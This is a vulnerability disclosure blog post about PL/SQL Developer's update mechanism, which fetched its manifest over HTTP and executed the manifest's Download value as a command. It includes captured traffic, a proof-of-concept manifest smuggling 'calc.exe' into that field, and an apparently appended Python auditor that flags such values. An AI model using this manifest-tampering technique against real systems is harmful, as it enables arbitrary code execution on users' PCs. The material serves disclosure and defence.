Adam Caudill

PL/SQL Developer: HTTP to Command Execution

While looking into PL/SQL Developer – a very popular tool for working with Oracle databases – to see how it encrypts passwords, I noticed something interesting. When testing Windows applications, I make it a habit to have Fiddler running to see if there is any interesting traffic – and in this case, there certainly was.

PL/SQL Developer has an update mechanism which retrieves a file containing information about available updates to PL/SQL Developer and other components; this file is retrieved via HTTP, meaning that an attacker in a privileged network position could modify this file.

This file is retrieved each time the application starts, and if a version listed in the file is greater than the version installed, the user is prompted to upgrade (this is the default behavior; if automatic checking is disabled, the user is not prompted until they select Help | Check Online Updates). They have the following options:

  • Update: If a URL is provided, the application will download a file (also over HTTP), and apply the update. If no URL is provided, the option is not presented to the user.
  • Download: Executes the URL provided, so that the user’s browser will open, and immediately download the file. This is typically an executable (*.exe); as is the case elsewhere, the file is retrieved over HTTP, and no validation is being performed.
  • Info: If the value is a URL, it is executed so that the user’s browser opens to the specified URL; otherwise the content is displayed in a message box.

There are (at least) two issues here:

  • Redirect to malicious download: as the user is likely unaware that they shouldn’t trust the file downloaded as a result of using the Download option, an attacker could replace the URL and point to a malicious file, or simply leverage their privileged position to provide a malicious file at the legitimate URL.
  • Command execution: when the user selects the Download option, the value in the file is effectively ShellExecute’d without any validation – there is no requirement that it be a URL. If a command is inserted, it will be executed in the context of the user.

This means that a user who believes they are downloading an update can actually be handing full control over to an attacker – this is a case where not bothering to use HTTPS to secure traffic provides multiple methods for an attacker to gain control of the user’s PC. This is a great example of the importance of using HTTPS for all traffic – it’s not just about privacy, it’s also critical for integrity.

The tested version of PL/SQL Developer was 11.0.4, though the issue likely well predates that version. The vendor reports that this issue has been addressed by enforcing HTTPS on their website, and application changes made in version 11.0.6. It is recommended that all users update to the latest version.

Vulnerability Note: VU#229047
CVE: CVE-2016-2346

Technical Details

The update file is retrieved from http://www.allroundautomations.com/update/pls.updates – the request issued by the application looks like this:

GET http://www.allroundautomations.com/update/pls.updates HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: www.allroundautomations.com
DNT: 1
Connection: Keep-Alive

Here’s what a response looks like – it’s an INI-like file; the Download value is the item we care about most here:

HTTP/1.1 200 OK
Date: Thu, 04 Feb 2016 21:50:18 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 11 Sep 2015 09:10:32 GMT
ETag: "fa1816-84a-55f29a88"
Accept-Ranges: bytes
Content-Length: 2122
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/plain

date=11092015

[plsqldev.exe]
Version=11.0.4.1774
WhatsNew=http://www.allroundautomations.com/registered/pls1104.txt
Download=http://files.allroundautomations.com/plsqldev1104.exe
Update=http://files.allroundautomations.com/plsqldev1104.upd

[plsqldoc.dll]
Version=1.2.2.0
ReleaseDate=
WhatsNew=Fixed "List index out of bounds" error during document generation
Download=http://www.allroundautomations.com/download/plsqldoc122.zip

[vcs.dll]
Version=1.2.4.0
ReleaseDate=
WhatsNew=Upgraded to work with PL/SQL Developer 9.0
Download=http://www.allroundautomations.com/download/vcs124.zip

[redgate.dll]
Version=1.1.1.134
ReleaseDate=
WhatsNew=Improved download and Installation of Red Gate products from within Plug-In
Download=http://www.allroundautomations.com/download/RedGate111.zip

[ftp.dll]
Version=2.1.0.0
ReleaseDate=
WhatsNew=New version with Timezone correction and some bugfixes.
Download=http://www.allroundautomations.com/download/ftp2.zip

[textexport.dll]
Version=1.1.0.0
ReleaseDate=
WhatsNew=New: allow columns to be included/excluded from export, allow first column (Line No) always include/exclude from export
Download=http://www.allroundautomations.com/download/textexport.zip

[activequerybuilder.dll]
Version=1.1.0.0
ReleaseDate=
WhatsNew=New: Updated for PL/SQL Developer 7.1
Download=http://www.allroundautomations.com/download/ActiveQueryBuilder.zip

[plotwindow.dll]
Version=1.1.0.0
WhatsNew=http://www.browserextender.com/forum/viewtopic.php?p=24#24
Download=http://www.browserextender.com/downloads.php?language=english#PlotWindow

[OB5.dll]
Version=
ReleaseDate=02022006
WhatsNew=http://www.orindasoft.com/public/Pages.php4?location=plsqlfeatures
Download=http://www.orindasoft.com/public/V4%20Patchestwo.php4

[QuickER.dll]
Version=2.6.0.54
WhatsNew=http://www.gotterup.net/release_notes.txt
Download=http://www.gotterup.net/quicker.exe

[QuickERPlugIn.dll]
Version=2.6.0.54
WhatsNew=http://www.gotterup.net/release_notes.txt
Download=http://www.gotterup.net/quicker.exe

By changing the returned file to replace this line:

Download=http://files.allroundautomations.com/plsqldev1104.exe

with this:

Download=calc.exe

calc.exe will be executed when the user selects the Download option.

Here is an example of a pls.updates file that demonstrates this flaw (the key changes are: increasing the Version so that the user sees it as an update, clearing the Update value so that the only option is Download, and setting Download to the command that you wish to be executed):

date=11122015

[plsqldev.exe]
Version=12.0.0.0
WhatsNew=http://www.allroundautomations.com/registered/pls1104.txt
Download=calc.exe
Update=

...
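The check a hardened update client should make before acting on a manifest like the ones above, written as an added example (it is not code from PL/SQL Developer or Allround Automations): parse the INI-like pls.updates layout, and for every component offering a version newer than the installed one, accept a Download or Update value only if it is an absolute https URL on a known vendor host or is empty (the option is not offered). A bare command such as `calc.exe` is reported rather than handed to ShellExecute. The allow-list of hosts, the installed-version table, and the constructed manifests are assumptions of this example.

```python
"""Validate a PL/SQL Developer pls.updates manifest before acting on it.

Added example; not code from PL/SQL Developer or Allround Automations.
Parses the INI-like layout from the post (a leading date= line, then
[component] blocks of key=value pairs) and applies the check a hardened
update client should make before passing a Download or Update value to
ShellExecute. The allow-list and installed-version table are assumptions.
"""
from urllib.parse import urlparse

# Hosts the real manifest points at. The allow-list itself is an assumption
# of this example, not something the application enforced.
ALLOWED_HOSTS = {"www.allroundautomations.com", "files.allroundautomations.com"}

# Keys whose value the application opens via ShellExecute. WhatsNew is left
# out: a non-URL WhatsNew is shown in a message box, not executed.
EXECUTED_KEYS = ("Download", "Update")


def parse_updates(text):
    """Parse pls.updates into (top-level keys, {component: {key: value}})."""
    top = {}
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections[current] = {}
            continue
        key, sep, value = line.partition("=")
        if not sep:
            raise ValueError("malformed line: %r" % raw)
        target = top if current is None else sections[current]
        target[key.strip()] = value.strip()
    return top, sections


def version_tuple(version):
    """'11.0.4.1774' -> (11, 0, 4, 1774); an empty or junk version compares lowest."""
    try:
        return tuple(int(p) for p in version.split("."))
    except ValueError:
        return ()


def check_target(value):
    """Return None if value is safe to open, otherwise the reason it is not."""
    if not value:
        return None  # empty: the application does not offer the option
    parsed = urlparse(value)
    if parsed.scheme not in ("http", "https"):
        # 'calc.exe' or any other non-URL lands here: ShellExecute would run it.
        return "not an http(s) URL; would be executed as a command"
    if parsed.hostname not in ALLOWED_HOSTS:
        return "host %r is not an allowed update host" % parsed.hostname
    if parsed.scheme != "https":
        return "plaintext http; contents can be altered in transit"
    return None


def audit(text, installed):
    """Findings for each offered update (newer than installed) that fails validation."""
    findings = []
    _, sections = parse_updates(text)
    for component, kv in sections.items():
        if component not in installed:
            continue  # only components actually present matter
        if version_tuple(kv.get("Version", "")) <= version_tuple(installed[component]):
            continue  # not newer: the application would not prompt
        for key in EXECUTED_KEYS:
            reason = check_target(kv.get(key, ""))
            if reason:
                findings.append("%s %s=%r: %s" % (component, key, kv.get(key, ""), reason))
    return findings


# Constructed manifests: the first mirrors the post's malicious example, the
# second the legitimate plsqldev.exe block as served over http at the time.
MALICIOUS = """\
date=11122015

[plsqldev.exe]
Version=12.0.0.0
WhatsNew=http://www.allroundautomations.com/registered/pls1104.txt
Download=calc.exe
Update=
"""

LEGITIMATE_HTTP = """\
date=11092015

[plsqldev.exe]
Version=11.0.4.1774
WhatsNew=http://www.allroundautomations.com/registered/pls1104.txt
Download=http://files.allroundautomations.com/plsqldev1104.exe
Update=http://files.allroundautomations.com/plsqldev1104.upd
"""

INSTALLED = {"plsqldev.exe": "11.0.3.0"}  # assumed installed version


if __name__ == "__main__":
    for name, manifest in (("malicious", MALICIOUS), ("legitimate-http", LEGITIMATE_HTTP)):
        print(name)
        for finding in audit(manifest, INSTALLED) or ["no findings"]:
            print("  " + finding)
```

Run against the malicious manifest, `audit` reports the `Download=calc.exe` value as a non-URL that would be executed; run against the 2016 manifest it flags both targets for being plaintext http, which is the post's point about integrity. Note that a version check alone does not help here: the attacker controls the Version field, so the newer-version trigger is exactly what the malicious manifest supplies.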

Special Thanks

Thanks to Garret Wassermann of CERT/CC for his assistance and Allround Automations for addressing the issue.
